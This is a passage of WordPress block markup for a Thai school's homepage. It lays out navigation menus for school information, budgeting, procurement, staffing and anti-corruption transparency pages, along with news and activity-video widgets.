wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 